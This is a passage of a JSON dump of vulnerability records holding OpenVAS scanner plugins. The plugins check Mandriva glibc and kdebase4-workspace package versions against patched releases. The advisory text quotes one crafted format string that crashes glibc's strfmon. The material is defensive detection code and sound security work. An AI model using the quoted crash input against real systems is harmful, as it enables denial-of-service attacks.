rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-20T13:17:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "description": "Check for the Version of glibc", "modified": "2017-12-19T00:00:00", "published": "2010-06-11T00:00:00", "id": "OPENVAS:831073", "href": "http://plugins.openvas.org/nasl.php?oid=831073", "type": "openvas", "title": "Mandriva Update for glibc MDVSA-2010:111 (glibc)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for glibc MDVSA-2010:111 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and fixed in glibc:\n\n Multiple integer overflows in the strfmon implementation in\n the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow\n context-dependent attackers to cause a denial of service (memory\n consumption or application crash) via a crafted format string, as\n demonstrated by a crafted first argument to the money_format function\n in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n \n Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c\n in the strfmon implementation in the GNU C Library (aka glibc or\n libc6) before 2.10.1 allows context-dependent attackers to cause a\n denial of service (application crash) via a crafted format string,\n as demonstrated by the %99999999999999999999n string, a related issue\n to CVE-2008-1391 (CVE-2009-4881).\n \n nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6)\n 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\n passwd.adjunct.byname map to entries in the passwd map, which allows\n remote attackers to obtain the encrypted passwords of NIS accounts\n by calling the getpwnam function (CVE-2010-0015).\n \n The encode_name macro in misc/mntent_r.c in the GNU C Library (aka\n glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs,\n does not properly handle newline characters in mountpoint names, which\n allows local users to cause a denial of service (mtab corruption),\n or possibly modify mount options and gain privileges, via a crafted\n mount request (CVE-2010-0296).\n \n Integer signedness error in the elf_get_dynamic_info function\n in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or\n libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows\n user-assisted remote attackers to execute arbitrary code via a crafted\n ELF program with a negative value for a certain d_tag structure member\n in the ELF header (CVE-2010-0830).\n \n Packages for 2008.0 and 2009.0 are provided as of the Extended\n Maintenance Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&products_id=490\n \n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"glibc on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-06/msg00005.php\");\n script_id(831073);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 13:46:51 +0200 (Fri, 11 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:111\");\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_name(\"Mandriva Update for glibc MDVSA-2010:111 (glibc)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.9~0.20081113.5.1mnb2\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-17T11:05:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880"], "description": "Check for the Version of kdebase4-workspace", "modified": "2018-01-16T00:00:00", "published": "2010-04-06T00:00:00", "id": "OPENVAS:1361412562310830967", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830967", "type": "openvas", "title": "Mandriva Update for kdebase4-workspace MDVA-2010:112 (kdebase4-workspace)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for kdebase4-workspace MDVA-2010:112 (kdebase4-workspace)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kdebase4-workspace on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"In mandriva 2010.0 /etc/pam.d/kde was not tagged as a config file so\n was replaced by a new file on each update.This update fixes this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-03/msg00046.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830967\");\n script_version(\"$Revision: 8438 $\");\n script_cve_id(\"CVE-2009-4880\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-16 18:38:23 +0100 (Tue, 16 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-06 08:56:44 +0200 (Tue, 06 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVA\", value: \"2010:112\");\n script_name(\"Mandriva Update for kdebase4-workspace MDVA-2010:112 (kdebase4-workspace)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kdebase4-workspace\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdebase4-workspace\", rpm:\"kdebase4-workspace~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase4-workspace-devel\", rpm:\"kdebase4-workspace-devel~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdm\", rpm:\"kdm~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdecorations4\", rpm:\"libkdecorations4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkephal4\", rpm:\"libkephal4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkfontinst4\", rpm:\"libkfontinst4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkfontinstui4\", rpm:\"libkfontinstui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkhotkeysprivate4\", rpm:\"libkhotkeysprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkscreensaver5\", rpm:\"libkscreensaver5~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libksgrd4\", rpm:\"libksgrd4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkwineffects1\", rpm:\"libkwineffects1~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkwinnvidiahack4\", rpm:\"libkwinnvidiahack4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkworkspace4\", rpm:\"libkworkspace4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"liblsofui4\", rpm:\"liblsofui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnepomukquery4\", rpm:\"libnepomukquery4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnepomukqueryclient4\", rpm:\"libnepomukqueryclient4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libplasma_applet_system_monitor4\", rpm:\"libplasma_applet_system_monitor4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libplasmaclock4\", rpm:\"libplasmaclock4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libplasma-geolocation-interface4\", rpm:\"libplasma-geolocation-interface4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpolkitkdeprivate4\", rpm:\"libpolkitkdeprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libprocesscore4\", rpm:\"libprocesscore4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libprocessui4\", rpm:\"libprocessui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsolidcontrol4\", rpm:\"libsolidcontrol4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsolidcontrolifaces4\", rpm:\"libsolidcontrolifaces4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtaskmanager4\", rpm:\"libtaskmanager4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtime_solar4\", rpm:\"libtime_solar4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libweather_ion4\", rpm:\"libweather_ion4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-battery\", rpm:\"plasma-applet-battery~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-calendar\", rpm:\"plasma-applet-calendar~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-quicklaunch\", rpm:\"plasma-applet-quicklaunch~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-cpu\", rpm:\"plasma-applet-system-monitor-cpu~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-hdd\", rpm:\"plasma-applet-system-monitor-hdd~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-hwinfo\", rpm:\"plasma-applet-system-monitor-hwinfo~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-net\", rpm:\"plasma-applet-system-monitor-net~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-temperature\", rpm:\"plasma-applet-system-monitor-temperature~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-webbrowser\", 